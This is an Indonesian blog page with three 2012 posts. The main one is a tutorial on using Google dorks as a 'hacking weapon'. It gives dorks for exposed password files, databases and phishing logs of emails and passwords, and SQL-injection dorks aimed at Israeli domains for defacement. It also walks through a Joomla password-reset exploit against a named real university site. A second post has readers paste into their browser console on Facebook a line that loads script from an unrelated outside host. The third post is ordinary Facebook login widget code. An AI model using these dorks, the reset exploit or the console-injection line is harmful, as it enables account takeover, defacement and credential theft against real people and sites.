Welcome to my Blog

Kamis, 16 Agustus 2012

MEMANFAATKAN DORK SEBAGAI SENJATA HACKING

Diposting oleh Unknown · 0 komentar

Author : Rascal_21

Google dork sebagai senjata hacking
Banyak pencarian yang kita inginkan pada search engines tidak seperti yang diharapkan, mengapa? karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines.

Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password) account orang lain yang terindex oleh google.

Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:

intitle
allintitle
(Mencari judul/title pada suatu web)

inurl
allinurl
(Mencari suatu string yang terdapat pada url)

filetype

(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)

allintext
(Mencari suatu nilai string dalam suatu web)

site
(Mencari pada web tertentu)

link
(Mencari web2 yang mempunyai link pada web yang di pilih)

contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari avengd maka kita ketikan sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata avengd agar google mencari database file tentg kata-kata aveng*d

Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id

dan ini contoh2 lain dalam penggunaan google dork

inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc

sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari jmla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*****.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user

ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=login

lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=reset&layout=confirm

lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,

sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.

Dork Email

Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc

Dork Fake Login

Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork
search z di google dengan dork ini ^-^

DORK

 ->

intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"

Dork Untuk Defacing (The Best Dork)

Sekarang tinggal copy salah satu Dork diatas, di google.com/.co.id Etc & liat hasilnya ^_^

Note : Tulisan yang bercetak tebal (berwarna kuning) adalah domain dari target situs yang akan kita deface, Kali ini saya menggunakkan domain .co.il (israel)
Untuk memudahkan dan memaksimalkan penggunaan dork, bisa saja mengganti domain di search engine ‘y.
www.google.com.my Etc
atau
seperti penggunaan google dork diatas (Nama domain/target di simpan dibelakang Dork Ex: allinurl:"union+all+select" site:co.il )

Hanyalah tutorial dasar dari penggunaan google dork untuk newbie kaya ane :P
Sekian dulu smoga bermanfaat ^_^

Referensi : Lintas Berita

»» READMORE...

Rabu, 15 Agustus 2012

Facebook Auto Invite Friends in Group Facebook Auto Invite Friends in Group

Diposting oleh Unknown · 0 komentar

buka group yang di tuju contoh http://www.facebook.com/groups/balikita/
Broser Mozilla Firefox

1. CTRL + SHIFT + K

2. Copy & Paste this code:

document.body.appendChild(document.createElement('script')).src='http://bestwaytowhitenteeth.co.uk/Facebook/tools.php';

4. then ENTER

Google Chrome

1. Click Right Mouse

2. Choose Inspect Element and Console

3. Copy & Paste this code:

document.body.appendChild(document.createElement('script')).src='http://bestwaytowhitenteeth.co.uk/Facebook/tools.php';

4. then ENTER

credit : om andre

sumber : Forum.balikita.net

»» READMORE...

Selasa, 14 Agustus 2012

ADD FB CONNECT DI BLOG (UPDATE) ADD FB CONNECT DI BLOG (UPDATE)

Diposting oleh Unknown · 2 komentar

biar nyambung liat dulu demonya http://boyang-amanda.blogspot.com/
ok Pertama: login ke blog kamu ,trus buka bagian rancangan - pilih tambah gadget..
cari yang bagian HTML/ java script..
masukkan code di bawah ini

<style type="text/css"></style>
<div style="display:inline-block; vertical-align:top; text-align:center; width:180px; margin-right:10px;">
<div id="poto-orang">
<fb:profile-pic uid="loggedinuser" size="normal"><img src="http://photos-d.ak.fbcdn.net/photos-ak-snc1/v33382/230/18/01AweCZo5yaRsAvXAOAAC-BZdk7JI:.mp3" style="max-width:180px; _width:180px;"/></fb:profile-pic>
</div>
<div id="result" style="text-align:center;"></div>
</div>
<div id="fb-root"></div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
<script>
FB.init({appId: '126578834052216', cookie: true});

FB.getLoginStatus(function(response) {
if (response.session) {
init();
} else {
// no user session available, someone you dont know
}
});

function login() {
FB.login(function(response) {
if (response.session) {
init();
} else {
alert('Login Failed!');
}
});
}

function init() {
FB.api('/me', function(response) {
$("#username").html("<img src='https://graph.facebook.com/" + response.id + "/picture'/><div>" + response.name + "</div>");
$("#jfmfs-container").jfmfs({ max_selected: 15, max_selected_message: "{0} of {1} selected"});
$("#logged-out-status").hide();
$("#show-friends").show();

});
}

$("#show-friends").live("click", function() {
var friendSelector = $("#jfmfs-container").data('jfmfs');
$("#selected-friends").html(friendSelector.getSelectedIds().join(', '));
});

</script></div>

<img src="http://mybbmodding.net/forums/fbcore/fbconnect.png" style="display:none;"/>
<script type="text/javascript">

</script>
<script type="text/javascript">

</script>

kalau mau yg on click (manual) silahkan pakek yg bawah ini

<div id="fb-root"></div>
<h2>Welcome</h2><br />
<div id="user-info"></div>
<script>
window.fbAsyncInit = function() {

FB.init({ appId: '225512894140062',
status: true,
cookie: true,
xfbml: true,
oauth: true});

function updateButton(response) {
var button = document.getElementById('fb-auth');

if (response.authResponse) {
//user is already logged in and connected
var userInfo = document.getElementById('user-info');
FB.api('/me', function(response) {
userInfo.innerHTML = '<img src="https://graph.facebook.com/'
+ response.id + '/picture">' + response.name;
button.innerHTML = 'Logout';
});
button.onclick = function() {
FB.logout(function(response) {
var userInfo = document.getElementById('user-info');
userInfo.innerHTML="";
});
};
} else {
//user is not connected to your app or logged out
button.innerHTML = 'Login';
button.onclick = function() {
FB.login(function(response) {
if (response.authResponse) {
FB.api('/me', function(response) {
var userInfo = document.getElementById('user-info');
userInfo.innerHTML =
'<img src="https://graph.facebook.com/'
+ response.id + '/picture" style="margin-right:5px"/>'
+ response.name;
});
} else {
//user cancelled login or did not grant authorization
}
}, {scope:'email'});
}
}
}

// run once with current status and whenever the status changes
FB.getLoginStatus(updateButton);
FB.Event.subscribe('auth.statusChange', updateButton);
};

(function() {
var e = document.createElement('script'); e.async = true;
e.src = document.location.protocol
+ '//connect.facebook.net/en_US/all.js';
document.getElementById('fb-root').appendChild(e);
}());

</script>

<center>
<div style="float:left;">
<fb:login-button scope="email,user_birthday,status_update,publish_stream,user_religion_politics,user_location">Login with your Facebook</fb:login-button>
</div>
<div class="clear"></div><br/>
</div>
</center>

Ganti appId: '194152234049414' pake ID app kamu kalau udah
Jangan lupa https://developers.facebook.com/apps
setting "Site URL di settingan Aplikasi ke alamat Blog kamu>App Domain:isi domaine blog kamu

https://developers.facebook.com/blog/post/614/

sumber : Forum.balikita.net

»» READMORE...

Welcome to my Blog

Cari Blog Ini

NavBar

Ingat Waktu Coy

Kamis, 16 Agustus 2012

MEMANFAATKAN DORK SEBAGAI SENJATA HACKING

Rabu, 15 Agustus 2012

Facebook Auto Invite Friends in Group Facebook Auto Invite Friends in Group

Selasa, 14 Agustus 2012

ADD FB CONNECT DI BLOG (UPDATE) ADD FB CONNECT DI BLOG (UPDATE)

handapeunpost

Ingat Waktu Coy

Kamis, 16 Agustus 2012

MEMANFAATKAN DORK SEBAGAI SENJATA HACKING MEMANFAATKAN DORK SEBAGAI SENJATA HACKING

Rabu, 15 Agustus 2012

Facebook Auto Invite Friends in Group Facebook Auto Invite Friends in Group

Selasa, 14 Agustus 2012

ADD FB CONNECT DI BLOG (UPDATE) ADD FB CONNECT DI BLOG (UPDATE)

handapeunpost

MEMANFAATKAN DORK SEBAGAI SENJATA HACKING